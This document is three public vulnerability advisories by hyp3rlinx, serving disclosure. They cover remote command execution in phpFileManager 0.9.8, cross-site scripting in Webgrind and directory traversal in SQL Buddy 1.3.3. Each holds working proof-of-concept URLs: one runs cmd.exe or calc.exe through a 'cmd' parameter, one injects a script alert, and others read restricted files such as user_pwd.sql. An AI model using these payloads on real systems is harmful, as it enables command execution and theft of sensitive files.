[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt Vendor: phpfm.sourceforge.net Product: phpFileManager version 0.9.8 Vulnerability Type: Remote Command Execution CVE Reference: == N/A Advisory Information: === Remote Command Execution Vulnerability Vulnerability Details: = PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victims browser. By getting the victim to click our malicious link or visit our malicious website. Exploit code(s): === Remote Command Execution: - 1- call Windows cmd.exe https://localhost/phpFileManager-0.9.8/index.php?action=6current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/cmd=c%3A\Windows\system32\cmd.exe 2- Run Windows calc.exe https://localhost/phpFileManager-0.9.8/index.php?action=6current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/cmd=c%3A\Windows\system32\calc.exe Disclosure Timeline: = Vendor Notification: NA July 28, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] phpFileManager 0.9.8 Vulnerable Parameter(s):[+] 'cmd'= [OS command] Affected Area(s): [+] Operating System === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Webgrind XSS vulnerability
Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt Vendor: https://github.com/jokkedk/webgrind Product: Webgrind is a Xdebug Profiling Web Frontend in PHP. Advisory Information: = Webgrind is vulnerable to cross site scripting attacks. Exploit code: == http://localhost/webgrind/index.php?op=fileviewerfile=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E Disclosure Timeline: == Vendor Notification May 19, 2015 May 20, 2015: Public Disclosure Severity Level: === Med Description: Request Method(s): [+] GET Vulnerable Product: [+] Webgrind Vulnerable Parameter(s): [+] file=[XSS] Affected Area(s): [+] Current user. == (hyp3rlinx)
Sqlbuddy Path Traversal Vulnerability
Exploit Author: John Page (hyp3rlinx) Website: hyp3rlinx.altervista.org/ Vendor Homepage: www.sqlbuddy.com Version: 1.3.3 SQL Buddy is an open source web based MySQL administration application. Advisory Information: == sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. .doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666requestKey=xx POC Exploit payloads: === 1-Read from Apache restricted directory under htdocs: http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo Severity Level: === High Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=somefile Affected Area(s): [+] Server directories sensitive files Solution - Fix Patch: === N/A